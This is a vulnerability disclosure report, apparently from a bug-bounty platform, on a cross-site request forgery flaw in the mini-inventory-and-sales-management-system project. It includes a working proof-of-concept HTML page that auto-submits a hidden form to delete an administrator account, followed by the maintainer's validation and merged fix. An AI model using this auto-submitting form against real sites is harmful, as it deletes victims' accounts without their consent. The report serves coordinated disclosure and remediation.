Cross-Site Request Forgery (CSRF) in amirsanni/mini-inventory-and-sales-management-system

Valid

Reported on

Sep 7th 2021


✍️ Description

Attacker is able to delete a administrator accounts if a logged in user visits attacker website.

🕵️‍♂️ Proof of Concept

1.when you logged in open this POC.html in a browser(Firefox and Safari)
2.you can check unintentionally you delete an administrator account.


//POC.html
<html>
 <body>
 <script>history.pushState('', '', '/')</script>
   <form action="https://1410inc.xyz/mini-inventory-and-sales-management-system/administrators/delete" method="POST">
     <input type="hidden" name="_aId" value="396" />
     <input type="submit" value="Submit request" />
   </form>
   <script>
     document.forms[0].submit();
   </script>
 </body>
</html>

💥 Impact

This vulnerability is capable of forging admin to unintentional delete an account.

💥 Test

Tested on Firefox and safari.

💥 Fix

You should set a CSRF token on this requests.

References

We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back 3 months ago
Musio
3 months ago

Researcher


hi are you checked this report?

Amir validated this vulnerability 7 days ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
Amir confirmed that a fix has been merged on ba36f6 7 days ago
Amir has been awarded the fix bounty